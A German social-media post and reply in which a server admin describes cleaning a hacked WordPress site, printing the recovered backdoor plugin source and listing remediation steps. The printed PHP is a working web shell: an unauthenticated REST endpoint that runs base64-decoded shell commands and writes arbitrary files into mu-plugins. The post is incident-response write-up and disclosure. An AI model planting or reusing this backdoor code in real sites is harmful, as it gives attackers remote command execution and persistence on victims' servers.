Elektrine lite

← Feed

@2ndStar@astronomy.social

Post #4393449

2026-08-05 20:01 UTC

Das war ein wilder Ritt heute! 🚪 :ablobcatbongokeyboard: Jetzt bin ich um ein paar Befehle und Wissen reicher! root@XX:/# qm guest exec 200 -- /bin/bash -c "cat '/var/www/XXX/wp-content/plugins/AVRIL_JANCOK-055b20828d92/AVRIL_JANCOK-055b20828d92.php'" { "exitcode" : 0, "exited" : 1, "out-data" : "array('GET','POST'),'permission_callback'=>'__return_true',\n 'callback'=>function($r){\n if($r->get_param('c')){\n ob_start();@passthru(base64_decode($r->get_param('c')).' 2>&1');$o=ob_get_clean();\n return new WP_REST_Response(array('s'=>'AVRIL_START_JANCOK','o'=>$o,'e'=>'AVRIL_END_JANCOK'));}\n if($r->get_param('u')){\n $f=$r->get_param('p')?:ABSPATH.'wp-content/mu-plugins/AVRIL_JANCOK.php';\n @mkdir(dirname($f),0755,true);@file_put_contents($f,base64_decode($r->get_param('u')));\n return new WP_REST_Response(array('s'=>'AVRIL_START_JANCOK','o'=>file_exists($f)?'OK':'FAIL','e'=>'AVRIL_END_JANCOK'));}\n return new WP_REST_Response(array('s'=>'AVRIL_START_JANCOK','o'=>'ALIVE','e'=>'AVRIL_END_JANCOK'));\n },\n ));\n});\n" }

Replies (1)

  • @2ndStar@astronomy.social 2026-08-06 12:13

    Hier ist der böse Bösewicht :-) Diese IP hat es nochmal versucht und heute nacht alles abgeklopft, ob ich ihm was übrig gelassen habe. Nachdem ich die Malware entfernt habe, kamen wenige Stunden später zwei Wellen automatisierter Kontrollanfragen auf genau die individuellen Backdoor-Dateien! Die Logdatei verrät hier, dass der Scanner die ehemalige Installation kennt. Er probiert hier nicht wahllos z. B. wp-admin oder xmlrpc, sondern genau die individuellen Artefakte seiner früheren Malware. root@xx:~# qm guest exec 200 -- sh -c 'grep "216\.194\.167\.162" /var/log/apache2/xxx_access.log' Was habe ich gestern alles getan? - WordPress-Core ersetzt - Backdoors und MU-Plugins entfernt - kompromittiertes (ein altes vergessenes) Theme entfernt - REST-RCE beseitigt - Cron-Persistenz entfernt - Passwörter geändert - Salts rotiert - Apache bereinigt - MySQL nur noch auf 127.0.0.1 und 3306 explizit getestet, dass er nicht von außen erreichbar ist - Fail2ban repariert - doppelte iptables-Regeln entfernt - Angreifer-IP dauerhaft gesperrt - Logfiles ausgewertet (Angreifer beobachtet -> 404 auf die nun entfernte Backdoor) Das war hier ein mehrstufiges Backdoor-Framework. Die Malware nutzt hier - Must-Use-Plugins - individuelle Dateinamen/Tokens - Health-Checks - Remote Command Execution - Persistenz - Selbsttests - regelmäßige Kontrollanfragen #WordPress #Malware

    Open ##4418612